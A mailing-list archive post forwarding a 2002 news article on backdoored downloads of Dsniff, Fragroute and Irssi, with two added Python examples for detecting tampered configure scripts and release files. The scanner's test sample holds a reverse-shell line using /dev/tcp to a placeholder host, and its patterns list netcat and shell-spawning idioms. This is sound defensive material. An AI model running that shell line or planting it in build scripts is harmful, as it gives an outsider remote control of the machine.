[iwar] [fc:Download.Sites.Hacked,.Source.Code.Backdoored]

From: Fred Cohen (fc@all.net)
Date: 2002-06-04 07:25:19


Message-Id: <200206041425.g54EPJd06319@red.all.net>
To: iwar@onelist.com (Information Warfare Mailing List)

Download Sites Hacked, Source Code Backdoored

The popular open-source security tool Fragroute is bugged in plain sight by
unknown hackers, who may have struck before.
By Brian McWilliams, Jun 3 2002 4:37PM

When source code to a relatively obscure, Unix-based Internet relay chat
(IRC) client was reported to be "backdoored" last month, security
professionals collectively yawned.

But last week, when three popular network security programs were reported to
be similarly compromised, security experts sat up and took notice.

Now, it appears that the two hacking incidents may have been related.

According to program developer Dug Song, the source code to the Dsniff,
Fragroute, and Fragrouter security tools was contaminated on May 17th after
an attacker gained unauthorized access to his site, Monkey.org.

In an interview today, Song said affected users are being contacted, but he
declined to provide details of the site compromise, citing an ongoing
investigation.

When installed on a Unix-based machine, the modified programs open a
backdoor accessible to a remote server hosted by RCN Corporation, according
to an excerpt of the contaminated Fragroute program posted Friday to Bugtraq
by Anders Nordby of the Norwegian Unix User Group.

In another posting to the Bugtraq mailing list last Friday, Song reported
that nearly 2,000 copies of the booby-trapped security programs were
downloaded by unsuspecting Internet users before the malicious code was
discovered May 24th. Only 800 of the downloads were from Unix-based
machines, according to Song.

Song's subsequent Bugtraq message said that intruders planted the
contaminated code at Monkey.org after successfully penetrating a machine
operated by one of the site's administrators. The attackers exploited
"client-side hole that produced a shell to one of the local admin's
accounts," wrote Song in his message.

The backdoor code planted at Monkey.org was nearly identical to a backdoor
program that attackers had recently slipped into the source distribution of
the Irssi IRC chat client for Unix.

According to a notice posted May 25th at Irssi.org, someone "cracked" the
distribution site for the IRC program in mid-March and altered a
configuration script to include the back door.
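Both incidents hid the backdoor in the build scaffolding a user runs before reading any of the program's real source. As an added example (not code from the article, from Irssi or from Monkey.org), the following heuristic scan flags lines in an autoconf-style configure script that open network connections or spawn shells, which a legitimate configure script has no reason to do. The regex patterns, the sample scripts and the placeholder host 192.0.2.10 are all constructed for illustration and do not reproduce the actual backdoor code from either incident.

```python
"""Heuristic scan of a configure script for callback-shell idioms.
Added example; patterns and samples are constructed, not taken from the
Irssi or Monkey.org backdoors."""
import re

# Constructed heuristic patterns: shell networking and shell-spawning idioms.
SUSPICIOUS = [
    (r"/dev/tcp/", "bash /dev/tcp redirection"),
    (r"\b(nc|netcat|telnet|socat)\b", "network client invoked"),
    (r"\b(sh|bash)\s+-i\b", "interactive shell spawned"),
    (r"\bexec\s+\d*[<>]", "exec with fd redirection"),
    (r"\bbase64\s+(-d|--decode)\b", "inline decode of payload"),
    (r"\b(perl|python)\s+-e\b", "inline interpreter one-liner"),
    (r"\buudecode\b", "uudecode of embedded payload"),
]
COMPILED = [(re.compile(p), why) for p, why in SUSPICIOUS]


def scan_configure(text):
    """Return [(lineno, reason, line)] for every non-comment line matching
    one of the patterns. Comment lines are skipped so that harmless
    documentation does not trigger findings; one finding per line."""
    findings = []
    for n, line in enumerate(text.splitlines(), 1):
        stripped = line.strip()
        if not stripped or stripped.startswith("#"):
            continue
        for rx, why in COMPILED:
            if rx.search(stripped):
                findings.append((n, why, stripped))
                break
    return findings


# Constructed sample: a fragment of an ordinary configure script.
CLEAN = """#!/bin/sh
# Guess values for system-dependent variables and create Makefiles.
ac_cv_prog_CC=gcc
echo "checking for gcc... $ac_cv_prog_CC"
cat >conftest.c <<EOF
int main(void) { return 0; }
EOF
$ac_cv_prog_CC -o conftest conftest.c >/dev/null 2>&1 && echo yes || echo no
"""

# Constructed sample: the same fragment with an added callback shell buried
# between harmless checks. Host and port are placeholders (TEST-NET-1).
TAMPERED = CLEAN + """
# intentionally placed in the middle of harmless checks
(sleep 5; exec sh -i 0</dev/tcp/192.0.2.10/6667 1>&0 2>&0) >/dev/null 2>&1 &
"""

if __name__ == "__main__":
    for name, script in (("clean", CLEAN), ("tampered", TAMPERED)):
        hits = scan_configure(script)
        print(f"{name}: {len(hits)} finding(s)")
        for n, why, line in hits:
            print(f"  line {n}: {why}: {line}")
```

A grep-style scan like this is only a first pass: the attacker controls the script text and can obfuscate it past any fixed pattern list. The stronger check, where the project ships configure.in or configure.ac, is to regenerate configure with autoconf and diff it against the shipped one, or to diff the shipped tarball against a copy whose signature you have verified.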

New Precautions Implemented
Installing the compromised Irssi program provided a remote server hosted by
FastQ Communications with full shell access to the target machine, said the
notice. Irssi's developer, Timo Sirainen, was not immediately available for
comment.

Today, the Web server at the Internet protocol address listed in the
backdoored Irssi code returned the message: "All your base are belong to
us."

Meanwhile, Unknown.nu, the colocated server listed in the backdoored
Monkey.org code, today displayed the home page of the Niuean Pop Cultural
Archive.

When contacted by SecurityFocus Online, the site's administrator, Kim
Scarborough, said he was unaware that the machine had been used by the
Monkey.org backdoor code.

Scarborough reported that he completely reinstalled the server's system
software, including the FreeBSD operating system, on May 30th after
discovering evidence that someone had hacked into it.

According to Scarborough, he had installed the Irssi chat client on the
machine around May 17th at the request of a user.

The two security incidents have forced the authors of the affected programs to
implement new measures to ensure the authenticity of their downloadable
code.

According to a page at Irssi describing the backdoor, new releases will be
signed with GPG (GnuPG), and the author will periodically review the
distributed programs for changes.

Song said that Monkey.org has implemented technology to restrict user
sessions, and that he is considering adding digital signatures to software
distributed at the site.
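The two countermeasures described above, signed releases and periodic review of the distributed files for changes, are complementary. As an added example (not code from Irssi or Monkey.org, and the release tree, file names and contents below are constructed), the following implements the review half: record a SHA-256 manifest of the download directory once, keep that manifest off the web host, then rebuild and compare on a schedule. It also shows the consumer-side counterpart, checking a downloaded file against a digest obtained out of band.

```python
"""Manifest-based integrity check for a software download directory.
Added example; not the tooling of any project named in the article."""
import hashlib
import os
import tempfile


def sha256_file(path):
    """Stream a file through SHA-256 and return the hex digest."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 16), b""):
            h.update(chunk)
    return h.hexdigest()


def build_manifest(root):
    """Map each regular file's path (relative to root, '/'-separated) to its digest."""
    manifest = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            manifest[rel] = sha256_file(full)
    return manifest


def diff_manifests(trusted, current):
    """Return (changed, added, removed) of the current tree versus the trusted manifest."""
    changed = sorted(p for p in trusted if p in current and trusted[p] != current[p])
    added = sorted(set(current) - set(trusted))
    removed = sorted(set(trusted) - set(current))
    return changed, added, removed


def verify_download(path, expected_sha256):
    """Consumer-side check against a digest obtained out of band (a signed
    announcement, a mailing-list post), never from the same server as the file."""
    return sha256_file(path) == expected_sha256.lower()


def demo_tamper_detection():
    """Build a constructed release tree, snapshot it, then tamper with it the
    way the article's intruders did (replace a tarball, drop a stray file)
    and return the resulting diff."""
    with tempfile.TemporaryDirectory() as root:
        rel = os.path.join(root, "releases")
        os.makedirs(rel)
        with open(os.path.join(rel, "tool-1.0.tar.gz"), "wb") as f:
            f.write(b"original tarball bytes")
        with open(os.path.join(rel, "tool-1.0.tar.gz.sig"), "wb") as f:
            f.write(b"detached signature over the original")
        trusted = build_manifest(root)
        # Tamper: swap in a trojaned tarball, leave the stale signature alone.
        with open(os.path.join(rel, "tool-1.0.tar.gz"), "wb") as f:
            f.write(b"original tarball bytes plus backdoor")
        with open(os.path.join(rel, ".hidden"), "wb") as f:
            f.write(b"dropped by intruder")
        return diff_manifests(trusted, build_manifest(root))


if __name__ == "__main__":
    changed, added, removed = demo_tamper_detection()
    print("changed:", changed)
    print("added:", added)
    print("removed:", removed)
```

Two caveats a practitioner should keep in mind. A manifest stored on the same host as the files is no better than the files, since whoever replaced the tarball can regenerate it; keep it offline or sign it. And the check is retrospective: in the Monkey.org case roughly a week passed before the change was noticed, so the review only bounds the exposure window, while a detached GPG signature that users actually verify is what protects each individual download.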


------------------
http://all.net/ 




This archive was generated by hypermail 2.1.2 : 2003-08-24 02:46:32 PDT